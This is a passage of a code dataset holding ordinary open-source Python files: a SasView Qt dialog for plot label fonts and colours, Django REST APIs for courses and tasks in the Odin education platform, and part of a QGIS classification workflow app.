queue.append(y)\n visited.add(y.idx)\n y.depth = x.depth + 1\n if y.depth > len(order1):\n order1.append([])\n order2.append([])\n order1[y.depth-1].append( (x.idx, y.idx) )\n order2[y.depth-1].append( (y.idx, x.idx) )\n bfs_order.append(y.idx)\n return bfs_order, forfor(order1)\n","repo_name":"qiangbo1222/HierDiff","sub_path":"generation/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1393,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"52"} +{"seq_id":"41468091628","text":"from PySide6 import QtCore\nfrom PySide6 import QtWidgets\n\nfrom sas.qtgui.Plotting.PlotUtilities import COLORS, COLORS_LETTER, WEIGHTS, FONTS\nfrom sas.qtgui.Plotting.UI.PlotLabelPropertiesUI import Ui_PlotLabelPropertiesUI\n\n\nclass PlotLabelPropertyHolder():\n def __init__(self, font=None, color=None, weight=None, size=None, text=\"\",):\n self.__properties = {}\n self.__properties['font'] = font\n self.__properties['color'] = color\n self.__properties['weight'] = weight\n self.__properties['size'] = size\n self.__properties['text'] = text\n\n @property\n def font(self):\n return self.__properties['font']\n\n @font.setter\n def font(self, value):\n self.__properties['font'] = value\n\n @property\n def color(self):\n return self.__properties['color']\n\n @color.setter\n def color(self, value):\n self.__properties['color'] = value\n\n @property\n def weight(self):\n return self.__properties['weight']\n\n @weight.setter\n def weight(self, value):\n self.__properties['weight'] = value\n\n @property\n def size(self):\n return self.__properties['size']\n\n @size.setter\n def size(self, value):\n self.__properties['size'] = value\n\n @property\n def text(self):\n return self.__properties['text']\n\n @text.setter\n def text(self, value):\n self.__properties['text'] = value\n\n\nclass PlotLabelProperties(QtWidgets.QDialog, Ui_PlotLabelPropertiesUI):\n \"\"\" Dialog for modification of plot label properties \"\"\"\n def __init__(self,\n parent=None,\n 
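# [Editor's example] get_bfs_order() above takes the edges as two parallel
# index lists (it zips them) plus the node count; a toy 4-node tree
# 0-1, 0-2, 1-3:
order, parent_edges = get_bfs_order([[0, 0, 1], [1, 2, 3]], 4)
# order        -> [0, 1, 2, 3]               (breadth-first from node 0)
# parent_edges -> [(0, 1), (0, 2), (1, 3)]   (flattened per-depth (parent, child) pairs)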
x_props={},\n y_props={}):\n\n super(PlotLabelProperties, self).__init__(parent)\n self.setupUi(self)\n # disable the context help icon\n self.setWindowFlags(self.windowFlags() & ~QtCore.Qt.WindowContextHelpButtonHint)\n\n self.setFixedSize(self.minimumSizeHint())\n\n self.custom_color = False\n self.custom_colory = False\n\n self._weight = x_props.weight\n self._color = x_props.color\n self._text = x_props.text\n self._size = x_props.size\n self._family = x_props.font\n\n self._weighty = y_props.weight\n self._colory = y_props.color\n self._texty = y_props.text\n self._sizey = y_props.size\n self._familyy = y_props.font\n\n # Fill out the color comboboxes\n self.cbColor.addItems(list(COLORS.keys())[:-1])\n self.cbColor_y.addItems(list(COLORS.keys())[:-1])\n # data1d.custom_color can now be a simple integer,\n # specifying COLORS dict index or a string containing\n # the hex RGB value, e.g. #00FF00\n if isinstance(self._color, int):\n self.cbColor.setCurrentIndex(self._color)\n elif self._color in COLORS.keys():\n self.cbColor.setCurrentIndex(list(COLORS.keys()).index(self._color))\n elif self._color in COLORS.values():\n self.cbColor.setCurrentIndex(list(COLORS.values()).index(self._color))\n elif self._color in COLORS_LETTER.keys():\n self.cbColor.setCurrentIndex(list(COLORS_LETTER.keys()).index(self._color))\n else:\n # Need the Custom entry here. \"Custom\" is always last.\n self.cbColor.addItems([list(COLORS.keys())[-1]])\n self.cbColor.setCurrentIndex(list(COLORS.keys()).index(\"Custom\"))\n self.custom_color = True\n\n if isinstance(self._colory, int):\n self.cbColor_y.setCurrentIndex(self._colory)\n elif self._colory in COLORS.keys():\n self.cbColor_y.setCurrentIndex(list(COLORS.keys()).index(self._colory))\n elif self._colory in COLORS.values():\n self.cbColor_y.setCurrentIndex(list(COLORS.values()).index(self._colory))\n elif self._colory in COLORS_LETTER.keys():\n self.cbColor_y.setCurrentIndex(list(COLORS_LETTER.keys()).index(self._colory))\n else:\n # Need the Custom entry here. 
\"Custom\" is always last.\n self.cbColor_y.addItems([list(COLORS.keys())[-1]])\n self.cbColor_y.setCurrentIndex(list(COLORS.keys()).index(\"Custom\"))\n self.custom_colory = True\n\n # Fill out the weight combobox\n self.cbWeight.addItems(WEIGHTS)\n try:\n self.cbWeight.setCurrentIndex(self._weight)\n except TypeError:\n marker_index = self.cbWeight.findText(self._weight)\n self.cbWeight.setCurrentIndex(marker_index)\n\n self.cbWeight_y.addItems(WEIGHTS)\n try:\n self.cbWeight_y.setCurrentIndex(self._weighty)\n except TypeError:\n marker_index = self.cbWeight_y.findText(self._weighty)\n self.cbWeight_y.setCurrentIndex(marker_index)\n\n # Fill out the font combobox\n self.cbFont.addItems(FONTS)\n try:\n self.cbFont.setCurrentIndex(self._family)\n except TypeError:\n marker_index = self.cbFont.findText(self._family)\n self.cbFont.setCurrentIndex(marker_index)\n\n self.cbFont_y.addItems(FONTS)\n try:\n self.cbFont_y.setCurrentIndex(self._familyy)\n except TypeError:\n marker_index = self.cbFont_y.findText(self._familyy)\n self.cbFont_y.setCurrentIndex(marker_index)\n\n\n self.txtLegend.setText(self._text)\n self.txtLegend_y.setText(self._texty)\n\n # Size\n self.cbSize.setValue(self._size)\n self.cbSize_y.setValue(self._sizey)\n\n # Connect slots\n self.cmdCustom.clicked.connect(self.onColorChange)\n self.cmdCustom_y.clicked.connect(self.onColorChange_y)\n self.cbColor.currentIndexChanged.connect(self.onColorIndexChange)\n self.cbColor_y.currentIndexChanged.connect(self.onColorIndexChange_y)\n\n def text_x(self):\n ''' return current legend text for x-axis '''\n return str(self.txtLegend.text())\n\n def text_y(self):\n ''' return current legend text for y-axis '''\n return str(self.txtLegend_y.text())\n\n def apply_to_ticks_x(self):\n ''' return status of the \"Apply to ticks\" checkbox for x-axis '''\n return self.chkTicks.isChecked()\n\n def apply_to_ticks_y(self):\n ''' return status of the \"Apply to ticks\" checkbox for y-axis '''\n return self.chkTicks_y.isChecked()\n\n def fx(self):\n ''' return font parameters for x-axis '''\n if self.custom_color:\n color = self._color\n else:\n color = self.cbColor.currentText()\n font = {'family': self.cbFont.currentText(),\n 'color': color,\n 'weight': self.cbWeight.currentText(),\n 'size': self.cbSize.value(),\n }\n return font\n\n def fy(self):\n ''' return font parameters for y-axis '''\n if self.custom_colory:\n color = self._colory\n else:\n color = self.cbColor_y.currentText()\n font = {'family': self.cbFont_y.currentText(),\n 'color': color,\n 'weight': self.cbWeight_y.currentText(),\n 'size': self.cbSize_y.value(),\n }\n return font\n\n def onColorChange(self):\n \"\"\"\n Pop up the standard Qt color change dialog\n \"\"\"\n # Pick up the chosen color\n proposed_color = QtWidgets.QColorDialog.getColor(parent=self)\n # Update the text control\n if proposed_color.isValid():\n # Block currentIndexChanged\n self.cbColor.blockSignals(True)\n # Add Custom to the color combo box\n self.cbColor.addItems([\"Custom\"])\n self.cbColor.setCurrentIndex(list(COLORS.keys()).index(\"Custom\"))\n # unblock currentIndexChanged\n self.cbColor.blockSignals(False)\n # Save the color as #RRGGBB\n self.custom_color = True\n self._color = str(proposed_color.name())\n\n def onColorChange_y(self):\n \"\"\"\n Pop up the standard Qt color change dialog\n \"\"\"\n # Pick up the chosen color\n proposed_color = QtWidgets.QColorDialog.getColor(parent=self)\n # Update the text control\n if proposed_color.isValid():\n # Block currentIndexChanged\n 
self.cbColor_y.blockSignals(True)\n # Add Custom to the color combo box\n self.cbColor_y.addItems([\"Custom\"])\n self.cbColor_y.setCurrentIndex(list(COLORS.keys()).index(\"Custom\"))\n # unblock currentIndexChanged\n self.cbColor_y.blockSignals(False)\n # Save the color as #RRGGBB\n self.custom_colory = True\n self._colory = str(proposed_color.name())\n\n def onColorIndexChange(self):\n \"\"\"\n Dynamically add/remove \"Custom\" color index\n \"\"\"\n # Changed index - assure Custom is deleted\n custom_index = self.cbColor.findText(\"Custom\")\n self.custom_color = False\n if custom_index > -1:\n self.cbColor.removeItem(custom_index)\n\n def onColorIndexChange_y(self):\n \"\"\"\n Dynamically add/remove \"Custom\" color index\n \"\"\"\n # Changed index - assure Custom is deleted\n custom_index = self.cbColor_y.findText(\"Custom\")\n self.custom_colory = False\n if custom_index > -1:\n self.cbColor_y.removeItem(custom_index)\n","repo_name":"SasView/sasview","sub_path":"src/sas/qtgui/Plotting/PlotLabelProperties.py","file_name":"PlotLabelProperties.py","file_ext":"py","file_size_in_byte":9338,"program_lang":"python","lang":"en","doc_type":"code","stars":44,"dataset":"github-code","pt":"52"} +{"seq_id":"25422755418","text":"from django.db.models import Q\n\nfrom rest_framework import status\nfrom rest_framework import serializers\nfrom rest_framework.views import APIView\nfrom rest_framework.generics import ListAPIView, get_object_or_404\nfrom rest_framework.response import Response\n\nfrom odin.apis.mixins import ServiceExceptionHandlerMixin\nfrom odin.common.utils import inline_serializer\n\nfrom odin.education.models import (\n Course,\n Student,\n Teacher,\n Week,\n ProgrammingLanguage,\n)\n\nfrom odin.education.services import (\n create_included_task_with_test,\n get_gradable_tasks_for_course,\n)\n\nfrom odin.education.apis.permissions import (\n CourseAuthenticationMixin,\n TeacherCourseAuthenticationMixin,\n CourseDetailAuthenticationMixin,\n)\n\n\nclass StudentCoursesApi(\n CourseAuthenticationMixin,\n ServiceExceptionHandlerMixin,\n ListAPIView\n):\n\n class Serializer(serializers.ModelSerializer):\n students_count = serializers.SerializerMethodField()\n description = serializers.CharField(source='description.verbose')\n\n class Meta:\n model = Course\n fields = ('id',\n 'name',\n 'start_date',\n 'end_date',\n 'logo',\n 'slug_url',\n 'description',\n 'students_count')\n\n def get_students_count(self, obj):\n return obj.students.filter(is_active=True).count()\n\n serializer_class = Serializer\n\n def get_queryset(self):\n user = self.request.user\n\n teacher = user.downcast(Teacher)\n student = user.downcast(Student)\n\n return Course.objects.filter(\n Q(teachers__in=[teacher]) | Q(students__in=[student])\n ).distinct()\n\n\nclass CourseDetailApi(\n ServiceExceptionHandlerMixin,\n CourseAuthenticationMixin,\n CourseDetailAuthenticationMixin,\n APIView\n):\n\n class CourseSerializer(serializers.ModelSerializer):\n problems = serializers.SerializerMethodField()\n languages = serializers.SerializerMethodField()\n weeks = serializers.SerializerMethodField()\n\n class Meta:\n model = Course\n fields = (\n 'id',\n 'name',\n 'start_date',\n 'end_date',\n 'logo',\n 'slug_url',\n 'problems',\n 'weeks',\n 'languages'\n )\n\n def get_problems(self, obj):\n return [\n {\n 'id': task.id,\n 'name': task.name,\n 'gradable': task.gradable,\n 'week': {\n 'id': task.week.id,\n 'number': task.week.number\n },\n 'description': task.description,\n 'last_solution': task.last_solution and {\n 'id': 
task.last_solution.id,\n                    'status': task.last_solution.verbose_status,\n                    'code': task.last_solution.code\n                } or None\n            } for task in obj.tasks\n        ]\n\n        def get_languages(self, obj):\n            return [\n                {\n                    'id': language.id,\n                    'name': language.name,\n                } for language in ProgrammingLanguage.objects.all()\n            ]\n\n        def get_weeks(self, obj):\n            return [\n                {\n                    'id': week.id,\n                    'number': week.number,\n                } for week in obj.weeks.all()\n            ]\n\n    def get_queryset(self):\n        return Course.objects.prefetch_related('weeks__included_tasks')\n\n    def get(self, request, course_id):\n        course = get_object_or_404(self.get_queryset(), pk=course_id)\n        user = self.request.user\n\n        course.tasks = get_gradable_tasks_for_course(course=course, user=user)\n\n        return Response(self.CourseSerializer(instance=course).data)\n\n\nclass TeacherCourseDetailApi(TeacherCourseAuthenticationMixin, APIView):\n    # Pending deprecation, rebase FE functionality to CourseDetailApi only\n    class Serializer(serializers.ModelSerializer):\n\n        weeks = serializers.SerializerMethodField()\n        languages = serializers.SerializerMethodField()\n\n        class Meta:\n            model = Course\n            fields = (\n                'id',\n                'name',\n                'start_date',\n                'end_date',\n                'logo',\n                'slug_url',\n                'languages',\n                'weeks',\n            )\n\n        def get_weeks(self, obj):\n            return [\n                {\n                    'id': week.id,\n                    'number': week.number,\n                    'tasks': [\n                        {\n                            'id': task.id,\n                            'name': task.name,\n                            'gradable': task.gradable,\n                            'description': task.description,\n                        } for task in week.included_tasks.all()\n                    ]\n                } for week in obj.weeks.all()\n            ]\n\n        def get_languages(self, obj):\n            return [\n                {\n                    'id': language.id,\n                    'name': language.name,\n                } for language in ProgrammingLanguage.objects.all()\n            ]\n\n    def get(self, request, course_id):\n        course = get_object_or_404(Course, pk=course_id)\n\n        return Response(self.Serializer(instance=course).data)\n\n\nclass CreateTaskApi(\n    ServiceExceptionHandlerMixin,\n    TeacherCourseAuthenticationMixin,\n    APIView\n):\n\n    class Serializer(serializers.Serializer):\n        course = serializers.PrimaryKeyRelatedField(\n            queryset=Course.objects.all(),\n            error_messages={\n                'does_not_exist':\n                ('Course does not exist')\n            }\n        )\n        name = serializers.CharField()\n        code = serializers.CharField()\n        requirements = serializers.CharField(required=False)\n        description_url = serializers.URLField()\n        gradable = serializers.BooleanField()\n        language = serializers.PrimaryKeyRelatedField(\n            queryset=ProgrammingLanguage.objects.all(),\n            error_messages={\n                'does_not_exist':\n                ('Programming Language does not exist')\n            }\n        )\n        week = serializers.PrimaryKeyRelatedField(\n            queryset=Week.objects.all(),\n            error_messages={\n                'does_not_exist':\n                ('Week does not exist')\n            }\n        )\n\n    def post(self, request, course_id):\n        data = request.data\n        data['course'] = course_id\n        serializer = self.Serializer(data=data)\n        serializer.is_valid(raise_exception=True)\n\n        task = create_included_task_with_test(**serializer.validated_data)\n\n        data = {\n            'task_id': task.id,\n            'task_name': task.name,\n            'gradable': task.gradable,\n        }\n\n        return Response(data=data, status=status.HTTP_201_CREATED)\n\n\nclass TeacherOnlyCourseDetailApi(\n    ServiceExceptionHandlerMixin,\n    TeacherCourseAuthenticationMixin,\n    APIView,\n):\n\n    class Serializer(serializers.ModelSerializer):\n        languages = serializers.SerializerMethodField()\n        students_count = serializers.IntegerField(source='students.count')\n        students = inline_serializer(many=True, fields={\n            'id': serializers.IntegerField(),\n            'user_id': serializers.IntegerField(source='user.id'),\n            'full_name': 
serializers.CharField(source='user.name'),\n 'solution_status_summary': inline_serializer(\n source='user.get_solution_summary', fields={\n 'OK': serializers.IntegerField(),\n 'TOTAL': serializers.IntegerField(),\n 'completed_tasks': inline_serializer(\n many=True,\n fields={\n 'task_id': serializers.IntegerField(),\n 'name': serializers.CharField(),\n 'solution_id': serializers.IntegerField(),\n 'solution_code': serializers.CharField(),\n 'test_result': serializers.DictField(),\n }\n )\n }),\n 'avatar': serializers.CharField(source='user.get_avatar'),\n })\n\n weeks = inline_serializer(many=True, fields={\n 'id': serializers.IntegerField(),\n 'number': serializers.IntegerField(),\n })\n\n def get_languages(self, obj):\n\n languages = inline_serializer(\n instance=ProgrammingLanguage.objects.all(),\n many=True,\n fields={\n 'id': serializers.IntegerField(),\n 'name': serializers.CharField()\n },\n )\n return languages.data\n\n class Meta:\n model = Course\n fields = (\n 'id',\n 'name',\n 'start_date',\n 'end_date',\n 'logo',\n 'slug_url',\n 'languages',\n 'weeks',\n 'students_count',\n 'students'\n )\n\n def get_queryset(self):\n return Course.objects.prefetch_related('students__user__solutions')\n\n def get(self, request, course_id):\n\n course = get_object_or_404(self.get_queryset(), pk=course_id)\n\n return Response(self.Serializer(instance=course).data)\n","repo_name":"prabhatpankaj/Odin","sub_path":"odin/education/apis/courses.py","file_name":"courses.py","file_ext":"py","file_size_in_byte":9722,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"37878071516","text":"import inspect\r\nimport tempfile\r\nimport traceback\r\n\r\nfrom PyQt5.uic import loadUi\r\nfrom qgis.core import QgsPalettedRasterRenderer\r\nfrom qgis.core import *\r\nfrom qgis.gui import *\r\nfrom qgis.PyQt.QtCore import *\r\nfrom qgis.PyQt.QtGui import *\r\nfrom qgis.PyQt.QtWidgets import *\r\n\r\nfrom enmapbox.qgispluginsupport.qps.speclib.core import is_spectral_library\r\nfrom _classic.hubdsm.core.color import Color as HubdsmColor\r\nfrom _classic.hubdsm.core.gdalraster import GdalRaster\r\nfrom _classic.hubdsm.core.qgsvectorclassificationscheme import QgsVectorClassificationScheme\r\nfrom _classic.hubdsm.processing.savelayerasclassification import saveLayerAsClassification\r\nfrom _classic.hubflow.core import *\r\nfrom _classic.classificationapp.script import classificationWorkflow, ProgressBar\r\n\r\npathUi = join(dirname(__file__), 'ui')\r\n\r\n\r\nclass ClassificationWorkflowApp(QMainWindow):\r\n uiTrainingType_: QComboBox\r\n uiType0Raster_: QgsMapLayerComboBox\r\n uiType0Classification_: QgsMapLayerComboBox\r\n uiType1Raster_: QgsMapLayerComboBox\r\n uiType1VectorClassification_: QgsMapLayerComboBox\r\n uiType1Dialog_: QToolButton\r\n uiType2Library_: QgsMapLayerComboBox\r\n\r\n def __init__(self, parent=None):\r\n QMainWindow.__init__(self, parent)\r\n loadUi(join(pathUi, 'main.ui'), self)\r\n self.uiInfo_ = QLabel()\r\n self.statusBar().addWidget(self.uiInfo_, 1)\r\n\r\n self.initMaps()\r\n self.initClassifier()\r\n self.initOutputs()\r\n\r\n self.uiTrainingType_.currentIndexChanged.connect(self.clearTrainingData)\r\n self.uiType0Raster_.layerChanged.connect(self.initClasses)\r\n self.uiType0Classification_.layerChanged.connect(self.initClasses)\r\n self.uiType1Dialog_.clicked.connect(self.openType1Dialog)\r\n self.uiType1Raster_.layerChanged.connect(self.initClasses)\r\n self.uiType1VectorClassification_.layerChanged.connect(self.initClasses)\r\n 
self.uiType2Library_.layerChanged.connect(self.initClasses)\r\n\r\n self.uiSampleSizePercent_.valueChanged.connect(self.updateSpinboxes)\r\n self.uiSampleSizePixel_.valueChanged.connect(self.updateSpinboxes)\r\n self.uiApply_.clicked.connect(self.updateSpinboxes)\r\n\r\n self.uiExecute_.clicked.connect(self.execute)\r\n\r\n self.spinboxes = None\r\n\r\n def openType1Dialog(self):\r\n layer = self.uiType1VectorClassification_.currentLayer()\r\n if layer is not None:\r\n CategoryFieldSelectionDialog.openLayerPropertiesDialog(layer=layer, parent=self)\r\n self.uiType1VectorClassification_.setLayer(layer=None)\r\n self.uiType1VectorClassification_.setLayer(layer=layer)\r\n\r\n def clearTrainingData(self):\r\n self.uiType0Raster_.setLayer(None)\r\n self.uiType0Classification_.setLayer(None)\r\n self.uiType1Raster_.setLayer(None)\r\n self.uiType1VectorClassification_.setLayer(None)\r\n self.uiType2Library_.setLayer(None)\r\n\r\n def initMaps(self):\r\n self.uiType0Raster_.setFilters(QgsMapLayerProxyModel.RasterLayer)\r\n self.uiType0Classification_.setFilters(QgsMapLayerProxyModel.RasterLayer)\r\n self.uiType1Raster_.setFilters(QgsMapLayerProxyModel.RasterLayer)\r\n self.uiType1VectorClassification_.setFilters(QgsMapLayerProxyModel.VectorLayer)\r\n self.uiType2Library_.setFilters(QgsMapLayerProxyModel.VectorLayer)\r\n self.uiRaster2_.setFilters(QgsMapLayerProxyModel.RasterLayer)\r\n\r\n def progressBar(self):\r\n return ProgressBar(bar=self.uiProgressBar())\r\n\r\n def log(self, text):\r\n self.uiInfo_.setText(str(text))\r\n QCoreApplication.processEvents()\r\n\r\n def uiProgressBar(self):\r\n obj = self.uiProgressBar_\r\n assert isinstance(obj, QProgressBar)\r\n return obj\r\n\r\n def pickClassColor(self):\r\n w = self.sender()\r\n color = QColorDialog.getColor()\r\n if color.name() != '#000000':\r\n w.setStyleSheet('background-color: {}'.format(color.name()))\r\n\r\n def keyPressEvent(self, event):\r\n super().keyPressEvent(event)\r\n if event.key() == Qt.Key_F1:\r\n self.onAdvancedClicked()\r\n\r\n def updateSpinboxes(self, *args):\r\n self.log('')\r\n\r\n if self.uiSampeMode_.currentText() == 'Percent':\r\n value = float(self.uiSampleSizePercent_.value())\r\n else:\r\n value = float(self.uiSampleSizePixel_.value())\r\n\r\n for spinbox, count in zip(self.spinboxes, self.counts):\r\n if self.uiSampeMode_.currentText() == 'Percent':\r\n spinbox.setValue(int(round(count * value / 100.)))\r\n else:\r\n spinbox.setValue(int(value))\r\n\r\n def filenameTmpClassification(self):\r\n return '/vsimem/classification_workflow/classification.bsq'\r\n\r\n def filenameTmpRaster(self):\r\n return '/vsimem/classification_workflow/raster.bsq'\r\n\r\n def initClasses(self, *args):\r\n self.log('')\r\n self.spinboxes = None\r\n self.uiStacked_.setEnabled(False)\r\n self.widget_.hide()\r\n self.widget_ = QWidget()\r\n self.layout_.addWidget(self.widget_)\r\n layout = QHBoxLayout(self.widget_)\r\n self.updateTotalSamples()\r\n\r\n if self.uiTrainingType_.currentIndex() == 0: # raster\r\n rasterLayer: QgsRasterLayer = self.uiType0Raster_.currentLayer()\r\n classificationLayer: QgsRasterLayer = self.uiType0Classification_.currentLayer()\r\n if rasterLayer is None or classificationLayer is None:\r\n return\r\n\r\n if not isinstance(classificationLayer.renderer(), QgsPalettedRasterRenderer):\r\n self.log('Selected layer is not a valid classification (requires Paletted/Unique values renderer).')\r\n self.uiType0Classification_.setLayer(None)\r\n return\r\n\r\n saveLayerAsClassification(\r\n 
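# rasterise the paletted classification into the temporary /vsimem file declared above\r\n                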
qgsMapLayer=classificationLayer,\r\n filename=self.filenameTmpClassification()\r\n )\r\n\r\n classification = Classification(filename=self.filenameTmpClassification())\r\n elif self.uiTrainingType_.currentIndex() == 1: # vector\r\n rasterLayer: QgsRasterLayer = self.uiType1Raster_.currentLayer()\r\n vectorClassificationLayer: QgsVectorLayer = self.uiType1VectorClassification_.currentLayer()\r\n if rasterLayer is None or vectorClassificationLayer is None:\r\n return\r\n\r\n if not isinstance(vectorClassificationLayer.renderer(), QgsCategorizedSymbolRenderer):\r\n\r\n dlg = CategoryFieldSelectionDialog(layer=vectorClassificationLayer, parent=self)\r\n if dlg.exec_():\r\n fieldName = dlg.field.currentField()\r\n fields: QgsFields = vectorClassificationLayer.fields()\r\n fieldIndex = fields.indexFromName(fieldName)\r\n uniqueValues = vectorClassificationLayer.uniqueValues(fieldIndex)\r\n categories = list()\r\n for value in uniqueValues:\r\n name = str(value)\r\n color = HubdsmColor.fromRandom()\r\n color = QColor(color.red, color.green, color.blue).name()\r\n symbol = QgsMarkerSymbol.createSimple(\r\n {'color': color, 'size': '2', 'outline_color': 'black'})\r\n categories.append(QgsRendererCategory(value, symbol, name, True))\r\n renderer = QgsCategorizedSymbolRenderer(fieldName, categories)\r\n vectorClassificationLayer.setRenderer(renderer)\r\n\r\n if dlg.checkBox.isChecked():\r\n CategoryFieldSelectionDialog.openLayerPropertiesDialog(\r\n layer=vectorClassificationLayer, parent=self\r\n )\r\n\r\n else:\r\n self.uiType1VectorClassification_.setLayer(None)\r\n return\r\n\r\n raster = Raster(filename=self.uiType1Raster_.currentLayer().source())\r\n\r\n if not raster.dataset().projection().equal(\r\n Vector(filename=vectorClassificationLayer.source()).dataset().projection()\r\n ):\r\n self.log('Projection mismatch between Raster and Vector Classification.')\r\n return\r\n\r\n self.log('Rasterize vector classification on raster grid')\r\n saveLayerAsClassification(\r\n qgsMapLayer=vectorClassificationLayer,\r\n grid=GdalRaster.open(raster.filename()).grid,\r\n filename=self.filenameTmpClassification()\r\n )\r\n self.log('')\r\n\r\n classification = Classification(filename=self.filenameTmpClassification())\r\n self.progressBar().setPercentage(0)\r\n\r\n elif self.uiTrainingType_.currentIndex() == 2: # speclib\r\n libraryLayer: QgsVectorLayer = self.uiType2Library_.currentLayer()\r\n if libraryLayer is None:\r\n return\r\n\r\n try:\r\n renderer = libraryLayer.renderer().clone()\r\n libraryLayer = QgsVectorLayer(baseName=libraryLayer.name(), path=libraryLayer.source())\r\n libraryLayer.setRenderer(renderer)\r\n except:\r\n self.uiType2Library_.setLayer(None)\r\n self.log('Selected layer is not a valid library.')\r\n return\r\n\r\n assert is_spectral_library(libraryLayer)\r\n\r\n if not isinstance(libraryLayer.renderer(), QgsCategorizedSymbolRenderer):\r\n self.uiType2Library_.setLayer(None)\r\n self.log('Selected layer is not a valid library classification (requires Categorized renderer).')\r\n return\r\n\r\n qgsVectorClassificationScheme = QgsVectorClassificationScheme.fromQgsVectorLayer(\r\n qgsVectorLayer=libraryLayer\r\n )\r\n\r\n # make pseudo raster\r\n X = list()\r\n y = list()\r\n fieldIndex = None\r\n for profile in libraryLayer:\r\n if fieldIndex is None:\r\n fieldIndex = profile.fieldNames().index(qgsVectorClassificationScheme.classAttribute)\r\n label = profile.attribute(fieldIndex)\r\n if label not in qgsVectorClassificationScheme.categories:\r\n continue\r\n category = 
qgsVectorClassificationScheme.categories[label]\r\n y.append(category.id)\r\n X.append(profile.values()['y'])\r\n X = np.array(X, dtype=np.float64)\r\n y = np.array(y)\r\n raster = Raster.fromArray(\r\n array=np.atleast_3d(X.T),\r\n filename=self.filenameTmpRaster()\r\n )\r\n classification = GdalRaster.createFromArray(\r\n array=np.atleast_3d(y),\r\n filename=self.filenameTmpClassification()\r\n )\r\n classification.setCategories(list(qgsVectorClassificationScheme.categories.values()))\r\n del classification\r\n classification = Classification(self.filenameTmpClassification())\r\n else:\r\n assert 0\r\n\r\n counts = classification.statistics()\r\n self.counts = counts\r\n\r\n self.spinboxes = list()\r\n self.colors = list()\r\n self.names = list()\r\n\r\n for i in range(classification.classDefinition().classes()):\r\n\r\n layout1 = QVBoxLayout()\r\n layout2 = QHBoxLayout()\r\n color = QToolButton()\r\n color.setStyleSheet(\r\n 'background-color: {}'.format(classification.classDefinition().color(i + 1)._qColor.name()))\r\n color.setMaximumWidth(25)\r\n color.setMaximumHeight(18)\r\n\r\n color.setAutoRaise(True)\r\n color.clicked.connect(self.pickClassColor)\r\n self.colors.append(color)\r\n layout2.addWidget(color)\r\n layout2.addWidget(QLabel('{}:'.format(i + 1)))\r\n name = QLineEdit(classification.classDefinition().name(i + 1))\r\n text = name.text()\r\n fm = name.fontMetrics()\r\n w = fm.boundingRect(text).width()\r\n name.resize(w, name.height())\r\n name.setMinimumWidth(w + 10)\r\n layout2.addWidget(name)\r\n # layout2.addWidget(QLabel('({} px) '.format(counts[i])))\r\n self.names.append(name)\r\n layout1.addLayout(layout2)\r\n\r\n # layout3 = QHBoxLayout()\r\n spinbox = QSpinBox()\r\n spinbox.setRange(0, counts[i])\r\n spinbox.setSingleStep(1)\r\n spinbox.setValue(counts[i])\r\n spinbox.setSuffix(' ({} px)'.format(counts[i]))\r\n spinbox.valueChanged.connect(self.updateTotalSamples)\r\n self.spinboxes.append(spinbox)\r\n layout1.addWidget(spinbox)\r\n # layout3.addWidget(QLabel('({} px) '.format(counts[i])))\r\n # layout1.addLayout(layout3)\r\n\r\n layout.addLayout(layout1)\r\n\r\n self.updateTotalSamples()\r\n\r\n # self.widget_.adjustSize()\r\n # self.adjustSize()\r\n\r\n self.uiStacked_.setEnabled(True)\r\n\r\n def updateTotalSamples(self, *args):\r\n total = 0\r\n if self.spinboxes is not None:\r\n for spinbox in self.spinboxes:\r\n total += int(spinbox.value())\r\n self.uiTotalSampleSize_.setText('Total sample size = {}'.format(total))\r\n\r\n def initClassifier(self):\r\n from _classic.enmapboxgeoalgorithms.algorithms import ALGORITHMS, ClassifierFit\r\n self.classifiers = [alg for alg in ALGORITHMS if isinstance(alg, ClassifierFit)]\r\n self.classifierNames = [alg.name()[3:] for alg in self.classifiers]\r\n self.uiClassifier_.addItems(self.classifierNames)\r\n self.uiClassifier_.currentIndexChanged.connect(\r\n lambda index: self.uiCode_.setText(self.classifiers[index].code()))\r\n self.uiClassifier_.setCurrentIndex(self.classifierNames.index('RandomForestClassifier'))\r\n\r\n def initOutputs(self):\r\n outdir = tempfile.gettempdir()\r\n self.uiSampledClassificationFilename_.setStorageMode(QgsFileWidget.SaveFile)\r\n self.uiModelFilename_.setStorageMode(QgsFileWidget.SaveFile)\r\n self.uiClassificationFilename_.setStorageMode(QgsFileWidget.SaveFile)\r\n self.uiProbabilityFilename_.setStorageMode(QgsFileWidget.SaveFile)\r\n self.uiReportFilename_.setStorageMode(QgsFileWidget.SaveFile)\r\n self.uiSampledClassificationFilename_.setFilePath(join(outdir, 'sample.bsq'))\r\n 
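# the remaining default output paths also land in the temp directory\r\n        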
self.uiModelFilename_.setFilePath(join(outdir, 'classifier.pkl'))\r\n self.uiClassificationFilename_.setFilePath(join(outdir, 'classification.bsq'))\r\n self.uiProbabilityFilename_.setFilePath(join(outdir, 'probability.bsq'))\r\n self.uiReportFilename_.setFilePath(join(outdir, 'accass.html'))\r\n\r\n def execute(self, *args):\r\n self.log('')\r\n\r\n try:\r\n saveSampledClassification = self.uiSampledClassificationFilename_.isEnabled()\r\n saveSampledClassificationComplement = saveSampledClassification # self.uiSampledClassificationComplementFilename_.isEnabled()\r\n saveModel = self.uiModelFilename_.isEnabled()\r\n saveClassification = self.uiClassificationFilename_.isEnabled()\r\n saveProbability = self.uiProbabilityFilename_.isEnabled()\r\n saveRGB = self.uiRGB_.isEnabled()\r\n saveReport = self.uiReportFilename_.isEnabled()\r\n filenameSampledClassification = self.uiSampledClassificationFilename_.filePath()\r\n filenameSampledClassificationComplement = '{}_complement{}'.format(\r\n *splitext(filenameSampledClassification)\r\n )\r\n filenameModel = self.uiModelFilename_.filePath()\r\n filenameClassification = self.uiClassificationFilename_.filePath()\r\n filenameProbability = self.uiProbabilityFilename_.filePath()\r\n filenameReport = self.uiReportFilename_.filePath()\r\n\r\n if self.uiTrainingType_.currentIndex() == 0: # raster\r\n qgsRaster = self.uiType0Raster_.currentLayer()\r\n qgsClassification = self.uiType0Classification_.currentLayer()\r\n if qgsRaster is None:\r\n self.log('Error: no raster selected')\r\n return\r\n if qgsClassification is None:\r\n self.log('Error: no classification selected')\r\n return\r\n raster = Raster(filename=qgsRaster.source())\r\n elif self.uiTrainingType_.currentIndex() == 1: # vector\r\n qgsRaster = self.uiType1Raster_.currentLayer()\r\n qgsClassification = 